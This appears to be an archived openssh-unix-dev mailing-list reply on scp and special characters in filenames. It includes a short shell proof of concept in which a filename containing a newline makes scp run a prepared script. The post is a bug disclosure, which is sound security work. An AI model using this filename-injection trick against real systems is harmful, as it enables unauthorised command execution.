Re: scp, sftp, and special characters in filenames

[Date Prev] [Date Next] [Thread Prev] [Thread Next] [Date Index] [Thread Index]

 

On 4/11/19 3:29 am, Demi M. Obenour wrote:

I have not been able to get scp(1) to download a file with a newline
in its name.  I know that scp(1) requires that remote filenames be
escaped for the shell, but that leads to protocol errors.


I see something much worse:

   $ sudo sh
   # echo "#!/bin/sh
   touch /tmp/b-ran" > /tmp/b
   # chmod a+x /tmp/b
   # exit
   $ touch a 'a
   b'
   $ rm -f abc /tmp/b-ran
   $ scp localhost:'a
   b' abc
   a                                                 100%    0     0.0KB/s   00:00
   $ ls /tmp/b-ran
   /tmp/b-ran

Scp can be exploited to run commands, which I think is a problem.

_______________________________________________
openssh-unix-dev mailing list
openssh-unix-dev@xxxxxxxxxxx
https://lists.mindrot.org/mailman/listinfo/openssh-unix-dev
[Date Prev] [Date Next] [Thread Prev] [Thread Next] [Date Index] [Thread Index]

[Index of Archives]     [Linux ARM Kernel]     [Linux ARM]     [Linux Omap]     [Fedora ARM]     [IETF Annouce]     [Security]     [Bugtraq]     [Linux]     [Linux OMAP]     [Linux MIPS]     [ECOS]     [Asterisk Internet PBX]     [Linux API]

  Powered by Linux